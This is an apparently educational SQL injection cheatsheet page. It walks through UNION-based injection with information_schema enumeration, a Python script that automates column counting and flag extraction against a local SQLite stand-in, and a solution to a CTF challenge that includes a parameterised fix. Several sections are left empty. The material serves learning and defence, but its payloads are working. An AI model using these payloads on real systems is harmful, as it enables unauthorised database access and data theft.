# sql injection

SQL injection cheatsheet

| Topic                                          | Intro                                                                    |
| ---------------------------------------------- | ------------------------------------------------------------------------ |
| [#sql-injection](#sql-injection "mention")     | SQL injection from basic to advanced                                     |
| [#nosql-injection](#nosql-injection "mention") | Basic NoSQL injection, e.g. MongoDB, Cassandra, GraphQL and more         |
| [#cheatsheet](#cheatsheet "mention")           | SQL and NoSQL cheatsheet: frequently used syntax and commonly used tools |

## SQL Injection

### Basic SQL Injection: Retrieving Data from Other Tables

{% hint style="info" %}
This section covers SQL injection in SELECT statements.
{% endhint %}

Example of easily vulnerable code:

```java
txtUserId = getRequestString("UserId");
// or any other unsanitized input: query string, form body, headers, etc.
txtSQL = "SELECT * FROM lulus WHERE id = " + txtUserId;
```

* `txtUserId` is concatenated straight into the query with `+`, without any filtering
* So we can leak every id and other tables, and even reach RCE if the MySQL user has the FILE privilege (`INTO OUTFILE`) and `secure_file_priv` allows writing to a useful location

Suppose we are asked to leak the username and password from the Users table; the payloads go like this.

First we find the number of columns, so that we can enumerate database and table names and query them. The vulnerable code above uses a numeric context, so no quote is needed; in a string context you would prepend `'` to close the string first:

```sql
1 GROUP BY 1--+    # works
1 GROUP BY 2--+    # works
1 GROUP BY 3--+    # works
1 GROUP BY 4--+    # error: Unknown column '4' in 'group statement'
```

{% hint style="info" %}
The material below shows how to use `information_schema` to leak information from the database.
{% endhint %}

Here I usually use GROUP BY, but you can also use ORDER BY, or a UNION SELECT with an increasing number of NULLs.

So there are 3 columns in total; now we query with UNION SELECT (`0x7c` is `|`, used as a separator; MySQL keywords and function names are case-insensitive, so the mixed case is only there to slip past naive keyword filters):

```sql
1 UNION SELECT NULL,NULL,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
```

The server reads it as:

```sql
select * 
from lulus 
where id = 1 
UNION 
SELECT NULL,NULL,gRoUp_cOncaT(0x7c,schema_name,0x7c) 
fRoM information_schema.schemata
```

and the output is the list of databases on the server, plus the row with id = 1 from the `lulus` table:

```
+------+--------------+---------------------------------------------------------------+
| id   | id_pendaftar | nama                                                          |
+------+--------------+---------------------------------------------------------------+
|    1 | 123          | Huna                                                          |
| NULL | NULL         | |information_schema|,|mysql|,|ctf|,|performance_schema|,|sys| |
+------+--------------+---------------------------------------------------------------+
```

The `ctf` database shows up right away, so let's query which tables exist in it using group_concat on `table_name`, like this:

```sql
1 UNION SELECT NULL,NULL,gRoUp_cOncaT(0x7c,table_name,0x7c) fRoM information_schema.tables where table_schema='ctf';
```

output:

```
+------+--------------+--------------------+
| id   | id_pendaftar | nama               |
+------+--------------+--------------------+
|    1 | 123          | Huna               |
| NULL | NULL         | |lulus|,|flag_123| |
+------+--------------+--------------------+
```

We know there is a flag table, so let's read it, but we don't know its columns. We can get them with a payload like this (add `and table_schema='ctf'` if the same table name might exist in another database):

```sql
select * from lulus where id = 1 UNION SELECT NULL,NULL,gRoUp_cOncaT(0x7c,column_name,0x7c) fRoM information_schema.columns where table_name='flag_123';
```

output:

```
+------+--------------+------------+
| id   | id_pendaftar | nama       |
+------+--------------+------------+
|    1 | 123          | Huna       |
| NULL | NULL         | |flag_321| |
+------+--------------+------------+
```

Now we know the only column is `flag_321`, so we query it directly:

```sql
1 UNION SELECT NULL,NULL,flag_321  from flag_123;
```

and we get the flag:

```
+------+--------------+------------------------+
| id   | id_pendaftar | nama                   |
+------+--------------+------------------------+
|    1 | 123          | Huna                   |
| NULL | NULL         | N2L{lulus_akademi_ctf} |
+------+--------------+------------------------+
```

In a real case the output won't look exactly like this; adapt as needed, but it will be similar.
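Putting the whole procedure above together, here is an added example (not code from the original page) that automates it against a constructed SQLite database standing in for the `ctf` schema. SQLite is used so it runs offline; its catalog is `sqlite_master` and `pragma_table_info()` rather than `information_schema.tables` and `information_schema.columns`, and the separator is passed as a plain string instead of `0x7c`. The column count is found with ORDER BY, which fails past the last column the same way the page's GROUP BY does. Table names, column names and the flag value are assumed to match the page's examples.

```python
import sqlite3


def setup_db():
    # Constructed sample data mirroring the page's tables (assumption).
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE lulus (id INTEGER, id_pendaftar TEXT, nama TEXT);
        INSERT INTO lulus VALUES (1, '123', 'Huna');
        CREATE TABLE flag_123 (flag_321 TEXT);
        INSERT INTO flag_123 VALUES ('N2L{lulus_akademi_ctf}');
    """)
    return con


def vulnerable_query(con, user_id):
    # Same bug as the page's snippet: input concatenated into the WHERE clause.
    sql = "SELECT * FROM lulus WHERE id = " + user_id
    return con.execute(sql).fetchall()


def count_columns(con, max_cols=20):
    # ORDER BY n errors as soon as n exceeds the number of selected columns,
    # so the last n that succeeds is the column count (GROUP BY n behaves the same).
    for n in range(1, max_cols + 1):
        try:
            vulnerable_query(con, "1 ORDER BY %d" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_extract(con, ncols, expr, from_clause):
    # Pad with NULLs so the UNION matches the original column count and put
    # the extraction expression in the last column. The injected row is the
    # one whose first column is NULL (real rows carry a numeric id).
    pad = ",".join(["NULL"] * (ncols - 1))
    payload = "1 UNION SELECT %s,%s FROM %s" % (pad, expr, from_clause)
    rows = vulnerable_query(con, payload)
    return [r[-1] for r in rows if r[0] is None][0]


def dump_flag(con):
    ncols = count_columns(con)
    # SQLite's equivalent of information_schema.tables is sqlite_master.
    tables = union_extract(con, ncols, "group_concat(name, '|')",
                           "sqlite_master WHERE type = 'table'")
    target = next(t for t in tables.split("|") if t.startswith("flag"))
    # SQLite's equivalent of information_schema.columns is pragma_table_info().
    columns = union_extract(con, ncols, "group_concat(name, '|')",
                            "pragma_table_info('%s')" % target)
    column = columns.split("|")[0]
    flag = union_extract(con, ncols, column, target)
    return ncols, tables, column, flag


if __name__ == "__main__":
    con = setup_db()
    ncols, tables, column, flag = dump_flag(con)
    print("columns:", ncols)
    print("tables:", tables)
    print("flag column:", column)
    print("flag:", flag)
```

Against MySQL the same driver works unchanged if `from_clause` is swapped for `information_schema.schemata`, `information_schema.tables where table_schema='ctf'` and `information_schema.columns where table_name='flag_123'`, exactly as in the payloads above.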

#### Example challenge

reference: LA CTF 2024 la-housing-portal

download:

{% file src="/files/yUABhu13c0V0ekt4NPCV" %}

> Try it yourself first; if you get stuck, come back here hehe..

vulnerable code:

```python
query = """
    select * from users where {} LIMIT 25;
    """.format(
        " AND ".join(["{} = '{}'".format(k, v) for k, v in prefs.items()])
    )
```

`prefs.items()` is not filtered, so we can put a `'` straight into the `v` being iterated (`v` is the value of a request form field: for `name=asw`, `k` is `name` and `v` is `asw`, giving `name = 'asw'`). From the code above we can see that a `'` closes the string, so the payload is:

```sql
' UNION SELECT 1,1,1,1,1,flag FROM flag where '1
```

which the server reads as (with `name` as the injected field):

```
select * from users where name = '' 
UNION SELECT 1,1,1,1,1,flag FROM flag where '1' LIMIT 25;
```

Why the trailing `where '1`? Because comments are blacklisted, so we can't comment out the rest of the query, and with just `' UNION SELECT 1,1,1,1,1,flag FROM flag` the server sees:

```
select * from users where name = '' 
UNION SELECT 1,1,1,1,1,flag FROM flag' LIMIT 25;
```

The `'` that the template appends before LIMIT is left dangling and the query errors. The fix is to end the payload with a true condition that consumes that quote: `where '1` (read as `where '1'`), `where '1'='1`, or any other always-true condition.

And how do we know the table is called `flag`? It is in the `get_flag` function (`select * from flag`); alternatively, enumerate the database, table and column names with the method above.
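The exchange described above, as an added example that is not the challenge's own code: a constructed SQLite stand-in for the challenge's query builder, with an assumed comment blacklist (the page only says comments are blacklisted), an assumed six-column `users` table to match the `1,1,1,1,1,flag` padding, and a made-up flag value. It runs the three cases discussed (a commented payload being blocked, the dangling-quote error, and the `where '1` terminator working) and then sends the same input to a parameterised, allow-listed version of the query to show the fix.

```python
import sqlite3


def setup_db():
    # Constructed stand-in for the challenge database (assumptions: six
    # columns in users, a one-column flag table, made-up flag value).
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (name TEXT, c2 TEXT, c3 TEXT, c4 TEXT, c5 TEXT, c6 TEXT);
        INSERT INTO users VALUES ('asw', 'x', 'x', 'x', 'x', 'x');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('lactf{constructed_demo_flag}');
    """)
    return con


# Assumed blacklist; the page only states that comments are blacklisted.
BLACKLIST = ("--", "/*", "#")


def build_query(prefs):
    # Same construction as the challenge snippet: keys and values are
    # formatted straight into the SQL string, values wrapped in quotes.
    return "select * from users where {} LIMIT 25;".format(
        " AND ".join("{} = '{}'".format(k, v) for k, v in prefs.items())
    )


def vulnerable_search(con, prefs):
    """Returns ("blocked", token), ("error", message) or ("ok", rows)."""
    for v in prefs.values():
        for tok in BLACKLIST:
            if tok in v:
                return ("blocked", tok)
    try:
        return ("ok", con.execute(build_query(prefs)).fetchall())
    except sqlite3.OperationalError as e:
        # e.g. the dangling quote left by the template: FROM flag' LIMIT 25;
        return ("error", str(e))


def safe_search(con, prefs):
    # Fix: column names checked against an allow-list (they cannot be bound
    # as parameters), values bound as parameters so a quote in the input can
    # never close the string literal.
    allowed = ("name", "c2", "c3", "c4", "c5", "c6")
    keys = list(prefs)
    if any(k not in allowed for k in keys):
        raise ValueError("unknown column")
    sql = "select * from users where {} LIMIT 25".format(
        " AND ".join("{} = ?".format(k) for k in keys)
    )
    return con.execute(sql, [prefs[k] for k in keys]).fetchall()


if __name__ == "__main__":
    con = setup_db()
    for payload in (
        "' UNION SELECT 1,1,1,1,1,flag FROM flag-- -",        # blocked
        "' UNION SELECT 1,1,1,1,1,flag FROM flag",            # dangling quote
        "' UNION SELECT 1,1,1,1,1,flag FROM flag where '1",   # works
    ):
        print(repr(payload), "->", vulnerable_search(con, {"name": payload}))
    print("safe:", safe_search(con, {"name": "' UNION SELECT 1,1,1,1,1,flag FROM flag where '1"}))
```

The `where '1` case works because the template's closing quote turns it into `where '1'`, which SQLite (like MySQL) evaluates as the number 1, i.e. true; the same payload against `safe_search` is just a string compared to `name` and returns nothing.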

### Blind SQL Injection

soon

## NOSQL Injection

## Cheatsheet

